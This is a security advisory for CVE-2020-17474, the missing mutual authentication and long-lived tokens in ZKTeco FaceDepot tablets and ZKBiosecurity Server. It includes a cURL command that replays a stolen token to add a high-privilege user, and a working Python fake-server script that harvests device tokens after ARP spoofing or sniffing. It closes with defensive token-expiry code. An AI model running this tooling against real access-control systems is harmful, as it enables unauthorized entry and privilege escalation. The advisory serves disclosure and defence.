Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server (CVE-2020-17474).

Disclosure timeline: the vulnerability was submitted to ZDI on Dec 3, 2019. ZDI received one response from the vendor, which acknowledged but did not confirm the vulnerability. The responsible-disclosure period expired on April 30, 2020. The vendor has since addressed the vulnerability and recommends installing the updated version of the software, available via the vendor's link.

The researchers tried two ways of stealing the access token, which the tablet submits in an HTTP header, and both worked:

1. Use a Python script (zkteco.py) and a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS), and ARP-spoof the tablet's traffic to HTTPS port 8088. The CA was never installed on the tablet, so the tablet accepts the impostor's certificate without complaint.

2. Capture the default deployment with Wireshark: it speaks HTTP instead of HTTPS, so the token crosses the network in cleartext.

Moreover, the token has a long life (at least two weeks) and remains valid even after a new token has been issued to the FaceDepot 7B (the Android tablet). A stolen token can be used for replay attacks, command forgery, arbitrary user addition and privilege escalation.

The proof-of-concept simulates ZKBiosecurity ADMS with a reasonable dummy response. After taking over ZKBiosecurity Server's IP address by ARP spoofing, the script obtains the token without any user interaction: the FaceDepot tablet reconnects to the server every 2 to 3 minutes and submits its legitimate token each time.

Once the device SN and the token are known, it is easy to, for example, create a user with cURL (the target URL and the data-file argument are missing from this copy of the advisory):

    curl -v -L -X POST -A 'iClock Proxy/1.09' '' \
      -b 'token=a72182ceb8e4695ea84300155953566d' \
      -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
      -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN'

The POST body is a single user record:

    user uuid= cardno= pin=11111 password= group=1 starttime=0 endtime=0 name=Bugoy Test1 privilege=14 disable=0 verify=0

Vulnerability Type
CWE-295: Improper Certificate Validation
CWE-613: Insufficient Session Expiration

Attack Vector
An attacker who can sniff the network, or ARP-spoof a fake server into the path, obtains a long-lasting token.

Mitigation
Deploy a firewall in front of ZKBiosecurity Server and enforce an allowed-IP list and an allowed-MAC list. This only narrows the attack surface: an attacker already on the tablet's L2 segment can spoof an allowed MAC and IP address, and neither list helps against passive sniffing of the plaintext HTTP deployment. The durable fixes are the vendor update, serving ADMS over HTTPS with a certificate the tablet actually verifies (client certificates as well, since the root cause is the missing mutual authentication), and short-lived tokens that the server revokes whenever it issues a new one.
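The token-harvesting side of the proof-of-concept, as an added example written for this page rather than the researchers' own zkteco.py: a fake ADMS endpoint that answers every tablet request with a placeholder body and records the SN and token, plus a parser that does the same for raw requests exported from a Wireshark capture of the plaintext deployment. It assumes the tablet identifies itself with an `SN=` query parameter and carries the token as a `token=` cookie, which is what the cURL replay above (`-b 'token=...'`) reflects; the reply body, the port 8088 default and the optional PEM certificate file are assumptions as well.

```python
"""Fake ADMS endpoint that records the FaceDepot token (added example).

Assumptions, not taken from the advisory: the tablet sends its serial as an
`SN=` query parameter and the token as a `token=` cookie (the advisory's
cURL replay uses `-b 'token=...'`); the reply body is a placeholder and the
listening port (8088) and certificate path are illustrative.
"""
import ssl
import sys
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

harvested = {}  # serial number -> last token seen from that tablet


def parse_request_head(raw: bytes) -> dict:
    """Split a captured HTTP request (e.g. a Wireshark export) into method,
    request target and lower-cased headers; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def extract_sn_and_token(target: str, headers: dict):
    """Return (SN, token) from the query string and Cookie header,
    with None for whichever is absent."""
    sn = parse_qs(urlsplit(target).query).get("SN", [None])[0]
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    token = jar["token"].value if "token" in jar else None
    return sn, token


def harvest(raw: bytes):
    """Parse one captured request and remember its token (sniffing path)."""
    req = parse_request_head(raw)
    sn, token = extract_sn_and_token(req["target"], req["headers"])
    if sn and token:
        harvested[sn] = token
    return sn, token


class FakeADMS(BaseHTTPRequestHandler):
    """Answers every request with a placeholder body and logs SN and token.
    The tablet reconnects every few minutes, so the token arrives on its own."""

    def _record_and_reply(self):
        headers = {k.lower(): v for k, v in self.headers.items()}
        sn, token = extract_sn_and_token(self.path, headers)
        if sn and token:
            harvested[sn] = token
            self.log_message("SN=%s token=%s", sn, token)
        length = int(self.headers.get("Content-Length") or 0)
        if length:
            self.rfile.read(length)  # drain the POST body so the socket stays sane
        body = b"OK\n"  # placeholder; the real ADMS reply is not reproduced here
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_GET = _record_and_reply
    do_POST = _record_and_reply


def serve(port: int = 8088, certfile: str = None):
    """Listen on the ADMS port; given a PEM file with cert and key, speak TLS
    (a self-signed certificate was enough in the researchers' test)."""
    httpd = HTTPServer(("0.0.0.0", port), FakeADMS)
    if certfile:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        ctx.load_cert_chain(certfile)
        httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()


if __name__ == "__main__":
    serve(certfile=sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it with a PEM file to stand in for the HTTPS server after ARP spoofing, or without one on the HTTP default; `harvest()` alone covers the Wireshark route, and `harvested` is the SN-to-token table that the cURL step above consumes.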
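What the CWE-613 half of the fix looks like on the server side, as an added example in Python and not code from ZKBiosecurity or its update: a token store that gives every token a short lifetime and revokes a device's previous token the moment a new one is issued, so a harvested token stops working within minutes instead of the two-plus weeks observed above. The TTL, the binding of a token to the device SN and the method names are assumptions about how an ADMS should behave, not a description of the patched product.

```python
"""Server-side token lifecycle with expiry and one live token per device
(added example illustrating the CWE-613 fix; not ZKBiosecurity code)."""
import secrets
import time

# Assumption: the tablet reconnects every 2-3 minutes, so a TTL of a few
# reconnect intervals keeps a live tablet working while bounding replay.
DEFAULT_TTL_SECONDS = 10 * 60


class TokenStore:
    """Maps tokens to (serial number, expiry); one live token per serial."""

    def __init__(self, ttl: float = DEFAULT_TTL_SECONDS, clock=time.monotonic):
        self._ttl = ttl
        self._clock = clock      # injectable so expiry can be tested offline
        self._by_token = {}      # token -> (sn, expires_at)
        self._current = {}       # sn -> the only token that is currently valid

    def issue(self, sn: str) -> str:
        """Mint a fresh random token for `sn`. The device's previous token is
        revoked immediately, which the vulnerable server did not do."""
        old = self._current.get(sn)
        if old is not None:
            self._by_token.pop(old, None)
        token = secrets.token_hex(16)  # 128 bits; the PoC token is also 32 hex chars
        self._by_token[token] = (sn, self._clock() + self._ttl)
        self._current[sn] = token
        return token

    def validate(self, sn: str, token: str) -> bool:
        """True only if the token exists, is bound to `sn` and has not expired.
        An expired token is purged; a wrong SN is rejected without purging, so
        a third party cannot knock a device offline by misusing its token."""
        entry = self._by_token.get(token)
        if entry is None:
            return False
        owner, expires_at = entry
        if self._clock() >= expires_at:
            self._revoke(token)
            return False
        return owner == sn

    def revoke_device(self, sn: str) -> None:
        """Administrative revocation, e.g. once a token is known to be leaked."""
        token = self._current.pop(sn, None)
        if token is not None:
            self._by_token.pop(token, None)

    def purge_expired(self) -> int:
        """Drop every expired token; returns how many were removed."""
        now = self._clock()
        expired = [t for t, (_, exp) in self._by_token.items() if now >= exp]
        for t in expired:
            self._revoke(t)
        return len(expired)

    def _revoke(self, token: str) -> None:
        entry = self._by_token.pop(token, None)
        if entry is not None and self._current.get(entry[0]) == token:
            del self._current[entry[0]]
```

A tablet whose token is rejected simply re-authenticates and receives a new one, which in turn kills whatever copy an attacker captured; pair this with certificate verification on the tablet (the CWE-295 half) so the token cannot be harvested in the first place.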